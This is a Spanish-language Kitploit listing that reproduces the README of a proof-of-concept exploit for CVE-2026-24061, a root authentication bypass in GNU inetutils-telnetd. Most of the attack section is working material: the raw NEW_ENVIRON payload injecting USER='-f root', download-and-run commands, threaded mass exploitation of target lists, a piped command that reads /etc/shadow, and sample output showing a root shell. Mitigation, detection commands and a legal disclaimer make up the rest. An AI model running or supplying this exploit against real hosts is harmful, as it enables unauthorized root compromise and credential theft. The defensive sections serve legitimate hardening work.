Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-24061 — Proof of Concept: CVE-2026-24061 es una vulnerabilidad crítica de omisión de autenticación en GNU inetutils-telnetd que permite a atacantes remotos no autenticados obtener acceso instantáneo a la shell root mediante la explotación maliciosa de la opción telnet NEW_ENVIRON. | Kitploit
Herramientas/GitHubGitHub/sh4den/cve-2026-24061
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónSeguridad de RedesPruebas de PenetraciónComando y ControlAutenticaciónPapers e InvestigaciónAprendizaje y EducaciónHerramienta de Acceso Remoto
GitHubsh4den/cve-2026-24061
613hace 2 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-24061

Proof of Concept: CVE-2026-24061 es una vulnerabilidad crítica de omisión de autenticación en GNU inetutils-telnetd que permite a atacantes remotos no autenticados obtener acceso instantáneo a la shell root mediante la explotación maliciosa de la opción telnet NEW_ENVIRON.

Ver Repositorio

CVE-2026-24061

GNU inetutils-telnetd - Bypass de Autenticación Remota

Una herramienta de investigación de seguridad para explotar CVE-2026-24061, una vulnerabilidad crítica de omisión de autenticación remota en GNU inetutils-telnetd que permite acceso instantáneo a un shell root sin autenticación.


Tabla de Contenidos

  • Resumen de la Vulnerabilidad
  • Versiones Afectadas
  • Análisis Técnico
  • Requisitos Previos
  • Instalación
  • Uso
  • Referencia de Salida
  • Metodología de Explotación
  • Mitigación y Corrección
  • Indicadores de Compromiso
  • Aviso Legal
  • Referencias
  • Créditos

Resumen de la Vulnerabilidad

CampoValor
Identificador CVECVE-2026-24061
Puntuación CVSS v3.19.8 (Crítico)
Vector CVSSCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Clasificación CWECWE-88: Neutralización Incorrecta de Delimitadores de Argumentos en un Comando
ProveedorProyecto GNU
Productoinetutils-telnetd
Fecha de Divulgación20 de enero de 2026
Parche DisponiblePor determinar

Resumen Ejecutivo

Existe una vulnerabilidad crítica en GNU inetutils-telnetd hasta la versión 2.7 que permite a atacantes remotos no autenticados eludir completamente la autenticación y obtener acceso inmediato a un shell root. La vulnerabilidad se explota mediante la opción telnet NEW_ENVIRON, inyectando una variable de entorno USER especialmente manipulada con el valor "-f root", que sortea todos los mecanismos de autenticación.

Evaluación del Impacto

  • Confidencialidad: Compromiso total de los datos del sistema
  • Integridad: Control completo del sistema con privilegios root
  • Disponibilidad: Posibilidad de toma completa del sistema o denegación de servicio
  • Alcance: Sin cambios: la explotación afecta solo al servicio telnet vulnerable

Versiones Afectadas

Rango de VersionesEstado
<= 2.7Vulnerable
> 2.7Estado del Parche: Por determinar

Análisis Técnico

Causa Raíz de la Vulnerabilidad

La vulnerabilidad se origina por la validación incorrecta de la variable de entorno USER en el manejador de la opción NEW_ENVIRON de telnetd. Al procesar la opción telnet NEW_ENVIRON, el servicio telnetd no sanitiza el valor de la variable USER antes de pasarlo al proceso de inicio de sesión. Al establecer USER en "-f root", el atacante inyecta argumentos de línea de comandos que fuerzan la autenticación exitosa para el usuario root sin necesidad de credenciales.

Vector de Ataque

  1. El atacante se conecta al servicio telnetd (normalmente puerto 23)
  2. Durante la negociación de opciones telnet, el servidor solicita datos NEW_ENVIRON
  3. El atacante responde con la variable de entorno USER establecida en "-f root"
  4. El argumento malicioso elude las comprobaciones de autenticación
  5. Se concede un shell root instantáneo sin ninguna solicitud de contraseña
  6. Se logra el compromiso total del sistema

Complejidad de Explotación

  • Requisitos Previos: Acceso de red al servicio telnetd objetivo
  • Autenticación: No requerida
  • Interacción del Usuario: Ninguna
  • Complejidad del Ataque: Baja

Requisitos Previos

Requisitos del Sistema

  • Python 3.7 o superior
  • Conectividad de red con la(s) instancia(s) telnetd objetivo
  • Permisos suficientes para ejecutar scripts de Python

Dependencias

Todas las dependencias son parte de la librería estándar de Python:


Instalación

Método 1: Usando Git

root@kitploit:~
# Clonar el repositorio
git clone https://github.com/sh4den/CVE-2026-24061.git
cd CVE-2026-24061

# Ejecutar el exploit
python3 main.py -u <target_ip>

Método 2: Descarga Directa

root@kitploit:~
# Descargar el exploit
curl -O https://raw.githubusercontent.com/sh4den/CVE-2026-24061/main/main.py

# Hacerlo ejecutable (Linux/macOS)
chmod +x main.py

# Ejecutar el exploit
python3 main.py -u <target_ip>

Método 3: Instalación Manual

root@kitploit:~
# Asegurarse de que Python 3.7+ está instalado
python3 --version

# Descargar y ejecutar
python3 main.py -u <target_ip>

Uso

Interfaz de Línea de Comandos

root@kitploit:~
Uso:
    python3 main.py -u <ip_objetivo> [-p <puerto>] [-usr <usuario>]
    python3 main.py -l <archivo_objetivos> [-p <puerto>] [-usr <usuario>]
    echo "comandos" | python3 main.py -u <ip_objetivo>

Argumentos:
    -u          Dirección IP o nombre de host de un solo objetivo
    -l          Ruta al archivo que contiene IPs objetivo (una por línea)
    -p          Puerto objetivo (por defecto: 23)
    -usr        Usuario para explotar (por defecto: root)

Explotación de un Solo Objetivo

Explotar una instancia telnetd:

root@kitploit:~
# Explotación básica (puerto 23 por defecto, usuario root)
python3 main.py -u 192.168.1.100

# Puerto personalizado
python3 main.py -u 192.168.1.100 -p 2323

# Usuario diferente
python3 main.py -u 192.168.1.100 -usr admin

Modo de Ejecución de Comandos

Ejecutar comandos de forma no interactiva:

root@kitploit:~
# Comando único
echo "id; whoami; uname -a" | python3 main.py -u 192.168.1.100

# Múltiples comandos
echo "cat /etc/passwd; cat /etc/shadow" | python3 main.py -u 192.168.1.100

# Comando con redirección de salida
echo "ps aux > /tmp/processes.txt" | python3 main.py -u 192.168.1.100

Explotación Masiva de Objetivos

Explotar múltiples objetivos desde un archivo:

root@kitploit:~
python3 main.py -l objetivos.txt
python3 main.py -l objetivos.txt -p 2323
python3 main.py -l objetivos.txt -usr admin

Formato del Archivo de Objetivos (objetivos.txt):

root@kitploit:~
192.168.1.100
192.168.1.101
10.0.0.50
172.16.0.25
telnet.example.com

Notas:

  • Un objetivo por línea
  • Direcciones IP o nombres de host
  • Las líneas vacías se ignoran
  • Los objetivos se explotan simultáneamente usando hilos

Referencia de Salida

Indicadores de Estado

Ejemplo de Salida

root@kitploit:~
╔═══════════════════════════════════════════════════════════════╗
║     CVE-2026-24061 - GNU inetutils-telnetd Auth Bypass        ║
║                                                               ║
║  CVSS Score: 9.8 (Critical)                                   ║
║  Impact: Remote Authentication Bypass - Instant Root Shell    ║
║                                                               ║
║          This tool is part of the HGrab Framework.            ║
╚═══════════════════════════════════════════════════════════════╝

[2026-01-23 14:32:15] [INFO] Target: 192.168.1.100:23, User: root
[2026-01-23 14:32:15] [SUCCESS] Connected to 192.168.1.100:23
[2026-01-23 14:32:15] [EXPLOIT] Sent payload: USER='-f root'
[2026-01-23 14:32:15] [INFO] Interactive mode - type commands

# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root

Metodología de Explotación

Proceso de Negociación del Protocolo Telnet

El exploit aprovecha la fase de negociación del protocolo telnet:

  1. Conexión Inicial: Se establece una conexión TCP al puerto objetivo
  2. Negociación de Opciones: El servidor envía comandos DO/WILL para varias opciones telnet
  3. Acuerdo TTYPE: El cliente acepta enviar el tipo de terminal (WILL TTYPE)
  4. Acuerdo TSPEED: El cliente acepta enviar la velocidad del terminal (WILL TSPEED)
  5. Acuerdo NEW_ENVIRON: El cliente acepta enviar variables de entorno (WILL NEW_ENVIRON)
  6. Subnegociación: El servidor solicita variables de entorno (SB NEW_ENVIRON SEND)
  7. Inyección del Payload: El cliente envía USER="-f root" en la respuesta NEW_ENVIRON
  8. Omisión de Autenticación: El servidor procesa la variable USER maliciosa
  9. Acceso al Shell: Se concede un shell root sin autenticación

Estructura del Payload

root@kitploit:~
# Telnet IAC (Interpret As Command) = 255
# SB (Subnegotiation Begin) = 250
# SE (Subnegotiation End) = 240
# NEW_ENVIRON option = 39

payload = bytes([
    255,        # IAC
    250,        # SB
    39,         # NEW_ENVIRON
    0,          # IS
    0,          # VAR
]) + b"USER" + bytes([1]) + b"-f root" + bytes([
    255,        # IAC
    240         # SE
])

Manejo de Sesión Interactiva

  • Multiplexación de Entrada: Usa select.select() para monitoreo simultáneo de socket y stdin
  • E/S No Bloqueante: Socket configurado para operaciones no bloqueantes
  • Procesamiento Telnet: Las secuencias IAC se eliminan de la salida para una visualización limpia
  • Gestión de Tiempo de Espera: Timeout de 30 segundos para ejecución de comandos

Mitigación y Corrección

Acciones Inmediatas

  1. Deshabilitar telnetd: Detener y deshabilitar el servicio telnetd inmediatamente

    root@kitploit:~
    # Sistemas basados en systemd
    sudo systemctl stop telnetd
    sudo systemctl disable telnetd
    
    # Sistemas basados en xinetd
    sudo service xinetd stop
    sudo chkconfig telnet off
    
  2. Reglas de Firewall: Bloquear el puerto telnet (23) a nivel de firewall

    root@kitploit:~
    # iptables
    sudo iptables -A INPUT -p tcp --dport 23 -j DROP
    
    # firewalld
    sudo firewall-cmd --permanent --remove-service=telnet
    sudo firewall-cmd --reload
    
  3. Aislamiento de Red: Eliminar el servicio telnet de sistemas expuestos a internet

    • Usar solo segmentos de red internos
    • Implementar listas de control de acceso (ACLs) de red

Recomendaciones a Largo Plazo

Soluciones Alternativas

Usar SSH en lugar de Telnet:

root@kitploit:~
# Instalar servidor OpenSSH
sudo apt-get install openssh-server  # Debian/Ubuntu
sudo yum install openssh-server      # RHEL/CentOS

# Habilitar e iniciar SSH
sudo systemctl enable sshd
sudo systemctl start sshd

Verificación Después de la Mitigación

root@kitploit:~
# Verificar que telnetd no esté ejecutándose
sudo netstat -tlnp | grep :23
sudo ss -tlnp | grep :23

# No debería devolver resultados si está correctamente deshabilitado

Indicadores de Compromiso

Análisis de Registros

Revisar los registros del sistema para los siguientes patrones:

Registros de Autenticación:

root@kitploit:~
# Buscar patrones de inicio de sesión inusuales
sudo grep telnetd /var/log/auth.log
sudo grep telnetd /var/log/secure

# Buscar variables de entorno USER sospechosas
sudo grep "USER.*-f" /var/log/auth.log

Registros de Red:

  • Conexiones telnet desde direcciones IP inesperadas
  • Conexiones al puerto 23 fuera del horario normal de operación
  • Múltiples conexiones rápidas al servicio telnet

Artefactos del Sistema

  • Procesos inesperados ejecutándose como root
  • Archivos de configuración del sistema modificados
  • Cuentas de usuario no autorizadas
  • Nuevas claves SSH en /root/.ssh/authorized_keys
  • Trabajos cron o tareas programadas sospechosas

Indicadores de Red

  • Conexiones salientes desde el proceso del servicio telnet
  • Exfiltración de datos hacia hosts externos
  • Conexiones de shell reverso
  • Actividad de escaneo de puertos originada desde el sistema comprometido
  • Intentos de movimiento lateral hacia otros sistemas internos

Comandos de Detección

root@kitploit:~
# Verificar conexiones telnet activas
sudo netstat -antp | grep :23

# Revisar inicios de sesión root recientes
sudo last | grep root

# Verificar archivos del sistema modificados
sudo rpm -Va  # RHEL/CentOS
sudo debsums -c  # Debian/Ubuntu

# Listar procesos de root
sudo ps aux | grep root

# Verificar claves SSH no autorizadas
sudo cat /root/.ssh/authorized_keys

Aviso Legal

IMPORTANTE: LEER ANTES DE USAR

Esta herramienta se proporciona estrictamente para:

  • Evaluaciones de seguridad autorizadas y pruebas de penetración
  • Fines educativos y de investigación en entornos controlados
  • Operaciones de seguridad defensiva con la debida autorización
  • Evaluación de vulnerabilidades de sistemas que usted posea o tenga permiso explícito para probar

Usos Prohibidos:

  • Acceso no autorizado a sistemas informáticos o redes
  • Explotación de sistemas sin el consentimiento explícito por escrito del propietario
  • Cualquier actividad que infrinja las leyes locales, estatales, federales o internacionales
  • Actividades maliciosas o compromiso no autorizado del sistema

Responsabilidad: Los autores, colaboradores y distribuidores de este software NO asumen ninguna responsabilidad por el mal uso, daños o actividades ilegales realizadas con esta herramienta. Los usuarios son los únicos responsables de:

  • Garantizar el cumplimiento de todas las leyes y regulaciones aplicables
  • Obtener la autorización adecuada antes de realizar pruebas de seguridad
  • Cualquier consecuencia derivada del uso o mal uso de este software

Aviso Legal: El acceso no autorizado a sistemas informáticos es un delito grave. Las infracciones pueden dar lugar a procesos judiciales conforme a:

  • Computer Fraud and Abuse Act (CFAA) - Estados Unidos (18 U.S.C. § 1030)
  • Computer Misuse Act 1990 - Reino Unido
  • Directiva de la Unión Europea sobre ataques contra sistemas de información
  • Legislación similar en otras jurisdicciones a nivel mundial

Las penalizaciones pueden incluir prisión, multas sustanciales y responsabilidad civil.

Al usar esta herramienta, usted reconoce que ha leído, entendido y acepta cumplir con este aviso legal y todas las leyes aplicables.


Referencias

Recursos Oficiales

  • Página principal de GNU Inetutils
  • Documentación de GNU Inetutils

Información de Vulnerabilidad

  • NVD - CVE-2026-24061
  • Registro CVE de MITRE
  • Divulgación en OpenWall (20 ene 2026)
  • Discusión en OpenWall (20 ene 2026)
  • Actualización en OpenWall (22 ene 2026)

Documentación Relacionada

  • CWE-88: Neutralización Incorrecta de Delimitadores de Argumentos
  • Especificación del Protocolo Telnet (RFC 854)
  • Opción de Entorno Telnet (RFC 1408)
  • Inyección de Comandos OWASP

Mejores Prácticas de Seguridad

  • Directrices NIST para Acceso Remoto
  • Puntos de Referencia CIS
  • Recursos de Seguridad SANS

Créditos

  • Autor del Exploit: Equipo IRIS C2
  • Framework: Parte del HGrab Framework
  • Descubrimiento: Comunidad de Investigación en Seguridad
  • Divulgación: Colaboradores de la lista de correo OpenWall

Historial de Cambios

VersiónFechaCambios
1.0.02026-01-23Lanzamiento inicial

Soporte y Contacto

Para preguntas, problemas o contribuciones:

  • Incidencias: Reportar errores o solicitar funciones a través de GitHub Issues
  • Seguridad: Reportar vulnerabilidades de forma responsable a los mantenedores
  • Contribuciones: Las solicitudes de extracción (pull requests) son bienvenidas

Licencia

Este proyecto se proporciona tal cual para fines autorizados de investigación en seguridad y educativos únicamente. No se proporciona ninguna garantía, expresa o implícita. Úselo bajo su propio riesgo y de acuerdo con todas las leyes y regulaciones aplicables.

USE SOLO CON LA DEBIDA AUTORIZACIÓN

Descargar herramienta
PaquetePropósito
socketComunicación de red
selectMultiplexación E/S
sysInteracción con el sistema
osInterfaz del sistema operativo
threadingExplotación concurrente de objetivos
datetimeFormato de marcas de tiempo
IndicadorColorDescripción
[SUCCESS]VerdeConectado exitosamente al objetivo
[EXPLOIT]VerdePayload de explotación enviado exitosamente
[INFO]AzulMensaje informativo sobre la operación actual
[ERROR]RojoError de conexión, tiempo de espera o error de explotación
[WARNING]AmarilloMensaje de advertencia (no se usa actualmente)
AcciónPrioridadDescripción
Migración a SSHCríticaReemplazar telnet por SSH para acceso remoto
Gestión de ParchesCríticaMonitorear y aplicar actualizaciones de seguridad
Auditoría de ServiciosAltaIdentificar y deshabilitar servicios de red innecesarios
Segmentación de RedAltaAislar sistemas críticos de redes públicas
Detección de IntrusionesMediaImplementar IDS/IPS para detectar intentos de explotación
Control de AccesoMediaImplementar listas blancas de IP para servicios remotos